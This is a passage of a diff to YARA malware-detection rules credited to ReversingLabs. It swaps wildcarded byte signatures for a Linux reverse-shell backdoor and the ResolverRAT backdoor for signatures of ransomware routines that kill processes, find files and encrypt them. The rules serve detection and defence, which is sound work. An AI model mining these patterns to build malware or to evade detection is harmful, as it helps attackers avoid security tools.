-            85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ??
-            ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ??
-            ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04 24
+		$encrypt_files_p4 = {
+            89 C3 48 89 D0 E8 ?? ?? ?? ?? 48 89 D9 48 89 C3 48 8B 84 24 ?? ?? ?? ?? 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ??
+            ?? ?? C3 90 0F 1F 40 ?? E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ??
+            ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ??
+            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90
+            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ??
+            ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84
+            24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            C3 90 66 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC
+            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ??
+            ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4
+            ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48
+            8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
+            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 90 66 90
+            E8 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B AC 24 ?? ?? ??
+            ?? 48 81 C4 ?? ?? ?? ?? C3 48 89 44 24 ?? 48 89 5C 24 ?? 48 89 4C 24 ?? 48 89 7C 24
+            ?? E8
         }
-		$reverse_shell_v2_p2 = {
-            E8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? FC F3 AB 89 4D
-            ?? 89 7D ?? A1 ?? ?? ?? ?? 89 C2 C1 EA ?? A1 ?? ?? ?? ?? 83 E0 ?? 0F AB 84 95 ?? ??
-            ?? ?? 8B 45 ?? 89 C2 C1 EA ?? 8B 45 ?? 83 E0 ?? 0F AB 84 95 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 3B 45 ?? 7E ?? A1 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ??
-            89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 8D ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 85 C0
-            0F 88 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 C2 83 E2 ?? A1 ?? ?? ?? ?? C1 E8 ?? 0F A3 94 85
-            ?? ?? ?? ?? 0F 92 C0 84 C0 74 ?? A1 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B
-            45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85
-            C0 0F 8E ?? ?? ?? ?? 8B 45 ?? 89 C2 83 E2 ?? 8B 45 ?? C1 E8 ?? 0F A3 94 85 ?? ?? ??
-            ?? 0F 92 C0 84 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ??
-            ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8D 85 ?? ??
-            ?? ?? 29 C2 8B 45 ?? 29 D0 89 45 ?? 83 7D ?? ?? 7E ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ??
-            8D 85 ?? ?? ?? ?? 8B 55 ?? 89 C7 89 D6 FC F3 A4 83 7D ?? ?? 7F ?? B8 ?? ?? ?? ?? 89
+		$find_files_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ??
+            ?? 48 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 DB 7E ?? 48 89 5C 24 ?? 31 C9 EB ??
+            48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8B 9C 24 ?? ?? ?? ?? 48 8D 43 ??
+            48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 58 ?? 48 89 5C
+            24 ?? 48 8B 72 ?? 48 89 D8 FF D6 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48
+            8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 49 89 C0 49 89 D9 31 C0 48
+            8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 4C 24 ?? 48
+            8B 51 ?? 48 8B 44 24 ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D
+            4B ?? 66 90 E9 ?? ?? ?? ?? 48 29 CB 48 89 DA 48 F7 DB 48 C1 FB ?? 48 21 D9 48 01 C1
+            48 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? EB ?? 31 D2 31 C9 48 89 C8 48 89 D3
+            E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ??
+            48 8B 3D ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 66 90 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ?? 48 89 6C 24 ?? 48 8D 6C
         }
-		$reverse_shell_v2_p3 = {
-            C1 2B 4D ?? 8B 45 ?? 89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 4C 24 ?? 89 44 24 ?? 8B 45 ??
-            89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 66
-            89 85 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 89 C2 C1 E2 ?? 0F B6 85 ?? ?? ??
-            ?? 66 0F B6 C0 8D 04 02 66 89 85 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 89 C2
-            C1 E2 ?? 0F B6 85 ?? ?? ?? ?? 66 0F B6 C0 8D 04 02 66 89 85 ?? ?? ?? ?? 8B 15 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 85 ?? ?? ??
-            ?? 89 D1 29 C1 89 C8 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89
-            14 24 E8 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 C2 03 55 ?? 8B 45 ?? 83 C0 ?? 89
-            D1 29 C1 89 C8 89 45 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 83 C2 ?? 8B
-            0D ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 0C 24 E8 ?? ?? ?? ?? 89 45 ?? E9 ?? ?? ??
-            ?? 8B 45 ?? 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ??
-            ?? 85 C0 7E ?? E9 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 04
-            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24
-            E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? 5E 5F 5D C3
+		$find_files_p2 = {
+            24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 8D 84 24 ?? ?? ?? ?? 31 C9 0F 1F 00 E9 ?? ?? ??
+            ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 84 C0 74 ?? 48 8B 44 24 ?? 48 8B
+            5C 24 ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 8B 54 24
+            ?? 0F 1F 00 48 39 CA 0F 8F ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF C9 48 85 C9 0F 8C ?? ??
+            ?? ?? 0F B6 14 08 66 90 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA ?? 0F 84 ?? ?? ?? ?? 80 FA
+            ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 42 ?? 48 89 4C 24 ?? 48 89 84
+            24 ?? ?? ?? ?? 48 8B 10 48 89 54 24 ?? 48 8B 70 ?? 48 89 74 24 ?? 48 8B 5C 24 ?? 48
+            8B 44 24 ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B 44
+            24 ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ??
+            48 89 DF 48 89 D3 48 89 C2 48 89 C8 48 89 D1 E8 ?? ?? ?? ?? 0F 1F 84 00 ?? ?? ?? ??
+            48 85 C0 0F 8D ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ?? ?? ?? ?? 48
+            8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 94 24 ?? ?? ?? ?? 48 8B 84
+            24 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 89 44 24 ??
+            48 89 5C 24 ?? 48 89 4C 24 ?? 66 90 E8
         }
-		$set_process_name_v2_p1 = {
-            55 89 E5 57 56 53 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 45 ?? 8B 00 A3 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? C1 E0 ?? 89
-            C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ??
-            F2 AE 89 C8 F7 D0 83 E8 ?? 03 45 ?? 83 C0 ?? 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1 E0 ??
-            89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89
-            45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9
-            ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89
-            45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 48 ?? 8B 45 ?? C1 E0
-            ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 10 8B 45 ?? 89 C7 89 D6 FC F3 A4 8B 45 ?? C1 E0
-            ?? 89 C2 A1 ?? ?? ?? ?? 01 C2 8B 45 ?? 89 02 8B 5D ?? 83 C3 ?? 8B 45 ?? C1 E0 ?? 89
-            C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D
+		$kill_procs_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC
+            24 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
+            89 5C 24 ?? 31 C9 66 90 EB ?? 48 8B 54 24 ?? 48 8D 4A ?? 48 8B 84 24 ?? ?? ?? ?? 48
+            8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ?? ?? 48 89 4C 24 ?? 48 C1
+            E1 ?? 48 8B 1C 08 48 89 5C 24 ?? 48 8B 4C 08 ?? 48 89 4C 24 ?? 48 8B 73 ?? 48 89 C8
+            FF D6 48 89 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48
+            8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 44 24 ?? FF D1 48
+            89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B
+            3D ?? ?? ?? ?? 48 89 C3 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48
+            89 08 48 8D BC 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 48 A5 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 7F ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            EB ?? 48 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 8D 84 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 48 85 C9 0F 84 ?? ?? ??
+            ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 12 48 89 54 24 ?? 48 8B 01 48 89 44 24 ?? 48 8B 59
+            ?? 48 89 5C 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 31 F6 EB ?? 48 8B 94 24 ?? ?? ?? ?? 48 83
         }
-		$set_process_name_v2_p2 = {
-            F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 03 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 A1
-            ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? C7 45 ??
-            ?? ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 8B 45 ?? C1 E0 ?? 03 45 ?? 8B 00 B9 ?? ?? ?? ??
-            89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 02 89 45 ?? 83
-            45 ?? ?? 8B 45 ?? 3B 45 ?? 7C ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 5D ?? 83 C3 ?? 8B 45
-            ?? C1 E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ??
-            ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 8D 04 03 89 45 ?? 83 45 ?? ?? 8B 45 ?? C1
-            E0 ?? 89 C2 A1 ?? ?? ?? ?? 8D 04 02 8B 00 85 C0 75 ?? 8B 55 ?? A1 ?? ?? ?? ?? 89 D1
-            29 C1 89 C8 89 C2 A1 ?? ?? ?? ?? 89 C7 FC 89 D1 B8 ?? ?? ?? ?? F3 AA 8B 55 ?? A1 ??
-            ?? ?? ?? 89 D7 29 C7 89 F8 8B 15 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 89 14
-            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5B 5E 5F 5D C3
+		$kill_procs_p2 = {
+            C2 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 89 CE 48 89 D1 48 89 74 24 ?? 48 89 8C 24 ??
+            ?? ?? ?? 48 8B 11 48 89 54 24 ?? 48 8B 79 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C
+            24 ?? 48 8B 7C 24 ?? 90 E8 ?? ?? ?? ?? 48 85 C0 0F 8C ?? ?? ?? ?? 48 8B 44 24 ?? BB
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 DE 31 C0 48 8D 1D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 44 0F 11 39 48 8D 94 24 ?? ?? ?? ?? 44 0F
+            11 3A 48 8D 15 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ??
+            ?? 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ??
+            ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 44 0F 11 BC 24 ?? ?? ?? ??
+            48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 1D ?? ??
+            ?? ?? BF ?? ?? ?? ?? 48 89 FE 48 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8B 44 24 ?? 90 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 FF C1 48 83 F9 ?? 0F 8C ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 0F 1F 40 ?? E8
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $packet_loop_v1_p* ) ) and ( all of ( $reverse_shell_v1_p* ) ) and ( all of ( $set_process_name_v1_p* ) ) ) or ( ( all of ( $packet_loop_v2_p* ) ) and ( all of ( $reverse_shell_v2_p* ) ) and ( all of ( $set_process_name_v2_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $kill_procs_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Resolverrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects ResolverRAT backdoor."
+		description = "Yara rule that detects Motocos ransomware."
 		author = "ReversingLabs"
-		id = "f62f50b6-7d2d-570b-82c8-f6e741270f1e"
-		date = "2025-06-30"
-		modified = "2025-06-30"
+		id = "cda44b86-c747-5b48-acd8-e68311ab24a3"
+		date = "2021-09-17"
+		modified = "2021-09-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/ByteCode.MSIL.Backdoor.ResolverRAT.yara#L1-L94"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4847650c49d305ea3c3e1dd23efefe03c485cff78253a49e06ee45bb46ebf360"
+		logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "ResolverRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Motocos"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$run_visual_executor = {
-            7E ?? ?? ?? ?? 3A ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 1F
-            ?? 28 ?? ?? ?? ?? 0B 06 1F ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 73 ?? ?? ?? ?? 25 20
-            ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 20 ?? ?? ??
-            ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ??
-            20 ?? ?? ?? ?? 63 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B
-            ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 63 20 ??
-            ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 25 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E
-        }
-		$execute_mixed_executor = {
-            12 ?? (FE | 15) ?? ?? ?? ?? ?? 12 ?? 06 8C ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            7D ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
-            06 7B ?? ?? ?? ?? 59 76 6C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ?? 20 ?? ??
-            ?? ?? 61 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 1A 8D ?? ?? ?? ?? 25 16 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2
-            25 17 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 25 18 12 ?? 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 25 19 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ??
-            ?? ?? ?? A2 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DD ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 20 ??
-            ?? ?? ?? 58 20 ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 7B ?? ?? ?? ?? 61 7E ?? ?? ?? ?? 28
+		$generate_key = {
+            55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15
+            ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ??
+            ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68
+            ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80
+            7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
+            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ??
+            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2
         }
